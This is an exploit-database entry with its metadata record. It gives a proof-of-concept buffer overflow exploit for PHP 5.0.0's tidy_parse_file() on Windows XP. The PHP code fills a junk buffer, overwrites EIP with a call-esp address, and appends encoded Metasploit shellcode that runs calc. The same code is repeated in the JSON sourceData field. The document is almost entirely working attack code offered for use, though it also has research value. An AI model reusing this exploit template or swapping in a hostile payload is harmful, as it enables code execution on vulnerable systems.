ID 1337DAY-ID-24793
Type zdt
Reporter Yakir Wizman
Modified 2016-09-19T00:00:00
Description
Exploit for php platform in category local exploits
<?php
#############################################################################
## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit
## Tested on Windows XP SP3 English
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 17/09/2016
## Buffer Overflow
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$junk = str_repeat("A", 2036); # 2036 x A
$eip = "\xaf\xc6\x17\x10"; # 0x1017c6af call esp @ php5ts.dll
# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc
$shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1".
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30".
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa".
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96".
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b".
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a".
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83".
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98".
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61".
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05".
"\x7f\xe8\x7b\xca";
$buffer = $junk.$eip.$shellcode;
tidy_parse_file(1,$buffer,1,1);
#tidy_repair_file(1,$buffer,1,1);
?>
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-24793", "lastseen": "2018-01-01T03:05:55", "viewCount": 7, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-01T03:05:55", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T03:05:55", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24793", "description": "Exploit for php platform in category local exploits", "title": "PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow", "cvelist": [], "sourceData": "<?php\r\n#############################################################################\r\n## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit\r\n## Tested on Windows XP SP3 English\r\n## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip\r\n## Date: 17/09/2016\r\n## Buffer Overflow\r\n## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)\r\n## http://www.black-rose.ml\r\n#############################################################################\r\n \r\n$junk = str_repeat(\"A\", 2036); # 2036 x A\r\n$eip = \"\\xaf\\xc6\\x17\\x10\"; # 0x1017c6af call esp @ php5ts.dll\r\n \r\n# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc\r\n$shellcode = \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\\xd9\\x74\\x24\\xf4\\xb1\".\r\n\"\\x1e\\x58\\x31\\x78\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\\x30\".\r\n\"\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\\xf3\\xb4\\xae\\x7d\\x02\\xaa\".\r\n\"\\x3a\\x32\\x1c\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\\xe7\\x96\".\r\n\"\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\".\r\n\"\\xf0\\x27\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\\xf7\\x3b\\x7a\".\r\n\"\\xcf\\x4c\\x4f\\x23\\xd3\\x53\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\".\r\n\"\\x1f\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\\xf5\\xc1\\x7e\\x98\".\r\n\"\\xf5\\xaa\\xf1\\x05\\xa8\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\".\r\n\"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\\x59\\x90\\x7b\\xd7\\x05\".\r\n\"\\x7f\\xe8\\x7b\\xca\";\r\n \r\n$buffer = $junk.$eip.$shellcode;\r\n \r\ntidy_parse_file(1,$buffer,1,1);\r\n#tidy_repair_file(1,$buffer,1,1);\r\n?>\n\n# 0day.today [2018-01-01] #", "published": "2016-09-19T00:00:00", "references": [], "reporter": "Yakir Wizman", "modified": "2016-09-19T00:00:00", "href": "https://0day.today/exploit/description/24793"}
{}
